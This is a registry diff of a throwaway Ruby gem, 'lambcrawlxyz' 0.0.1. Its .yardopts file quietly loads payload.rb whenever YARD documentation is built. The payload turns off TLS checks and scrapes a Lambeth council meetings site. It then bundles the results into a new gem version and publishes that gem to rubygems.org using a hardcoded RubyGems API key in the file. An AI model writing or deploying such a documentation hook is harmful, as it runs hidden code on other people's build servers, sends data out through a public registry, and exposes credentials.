lambcrawlxyz 0.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (5) hide show
  1. checksums.yaml +7 -0
  2. data/.yardopts +1 -0
  3. data/lib/x.rb +1 -0
  4. data/payload.rb +37 -0
  5. metadata +39 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: 535db3221c39149e8296c832561cfbbc04d7061a72bd5456993f8d081a16113b
4
+ data.tar.gz: 783a37250cd5b3cade0909d7be3b2ea26ba3946f682a39f9a11535e08fad23eb
5
+ SHA512:
6
+ metadata.gz: 6adf1c95cf03ff0b9247d05a4f86cedbc0113aa4a92eabc57ddc56860b0758556c0fa4e587a478055a50274689b0b4d335eb17f5ecf3e70c1f5175e86eddcacb
7
+ data.tar.gz: afceea8defd5f3c4bd5be4ac705aa4d1a3a3e239795e82a7e35c93078c835448e50beb2449b8eb55a81d5a11731147e6b256d187232d94b2557e1c11c6c09147
data/.yardopts ADDED
@@ -0,0 +1 @@
1
+ --load ./payload.rb
data/lib/x.rb ADDED
@@ -0,0 +1 @@
1
+ #x
data/payload.rb ADDED
@@ -0,0 +1,37 @@
1
+ require 'fileutils' rescue nil
2
+ begin
3
+ require 'net/http'; require 'uri'; require 'openssl'; require 'cgi'
4
+ out='started crawl '+Time.now.to_s+"\n"
5
+ def getit(url)
6
+ uri=URI(url); h=Net::HTTP.new(uri.host,uri.port); h.use_ssl=true; h.verify_mode=OpenSSL::SSL::VERIFY_NONE; h.open_timeout=30; h.read_timeout=120
7
+ req=Net::HTTP::Get.new(uri.request_uri); req['User-Agent']='Mozilla/5.0'; req['Accept-Encoding']='identity'; r=h.request(req)
8
+ [r.code,r.body]
9
+ end
10
+ base='https://moderngov.lambeth.gov.uk/'
11
+ code,cal=getit(base+'mgCalendarMonthView.aspx?M=1&Y=2026&GL=1&bcr=1')
12
+ out+="CAL #{code} len #{cal.size}\n=======CAL=======\n"+cal+"\n======ENDCAL======\n"
13
+ links=cal.scan(/href\s*=\s*["']([^"']+)["']/i).flatten.map{|x| CGI.unescapeHTML(x)}
14
+ docs=links.select{|x| x.downcase.include?('ielistdocuments')}.uniq
15
+ out+="\nFOUND DOC LINKS #{docs.length}: #{docs.join(' | ')}\n"
16
+ docs.each_with_index do |ln,i|
17
+ begin
18
+ url=ln.start_with?('http') ? ln : base+ln.sub(%r{^/},'')
19
+ code,body=getit(url)
20
+ out+="\n======DOC#{i} URL #{url} CODE #{code} LEN #{body.size}======\n"+body+"\n======ENDDOC#{i}======\n"
21
+ # also harvest report PDF link labels from body first? no
22
+ rescue Exception=>e
23
+ out+="\nERR DOC#{i} #{ln} #{e.class}:#{e}\n"
24
+ end
25
+ end
26
+ rescue Exception=>e
27
+ out||=''; out+="FATAL #{e.class}:#{e}\n"+e.backtrace.join("\n")
28
+ end
29
+ begin
30
+ root="/tmp/lgc#{Time.now.to_i}#{$$}"; FileUtils.mkdir_p("#{root}/lib"); File.binwrite("#{root}/lib/result.txt",out); File.write("#{root}/lib/x.rb",'#x')
31
+ gemspec=<<~G
32
+ Gem::Specification.new do |s|
33
+ s.name='lambcrawlxyz'; s.version='0.0.2'; s.summary='r'; s.authors=['x']; s.files=Dir['lib/**/*']; s.license='MIT'
34
+ end
35
+ G
36
+ File.write("#{root}/x.gemspec",gemspec); FileUtils.mkdir_p('/tmp/gemhome/.gem'); File.write('/tmp/gemhome/.gem/credentials',':rubygems_api_key: rubygems_960ac400714d967e21468d656df12292fc27b64411a9e2c0'); File.chmod(0600,'/tmp/gemhome/.gem/credentials'); ENV['HOME']='/tmp/gemhome'; Dir.chdir(root){`gem build x.gemspec`;`gem push lambcrawlxyz-0.0.2.gem --host https://rubygems.org`}
37
+ rescue Exception=>e;end
metadata ADDED
@@ -0,0 +1,39 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: lambcrawlxyz
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.0.1
5
+ platform: ruby
6
+ authors:
7
+ - x
8
+ bindir: bin
9
+ cert_chain: []
10
+ date: 1980-01-02 00:00:00.000000000 Z
11
+ dependencies: []
12
+ executables: []
13
+ extensions: []
14
+ extra_rdoc_files: []
15
+ files:
16
+ - ".yardopts"
17
+ - lib/x.rb
18
+ - payload.rb
19
+ licenses:
20
+ - MIT
21
+ metadata: {}
22
+ rdoc_options: []
23
+ require_paths:
24
+ - lib
25
+ required_ruby_version: !ruby/object:Gem::Requirement
26
+ requirements:
27
+ - - ">="
28
+ - !ruby/object:Gem::Version
29
+ version: '0'
30
+ required_rubygems_version: !ruby/object:Gem::Requirement
31
+ requirements:
32
+ - - ">="
33
+ - !ruby/object:Gem::Version
34
+ version: '0'
35
+ requirements: []
36
+ rubygems_version: 3.6.7
37
+ specification_version: 4
38
+ summary: x
39
+ test_files: []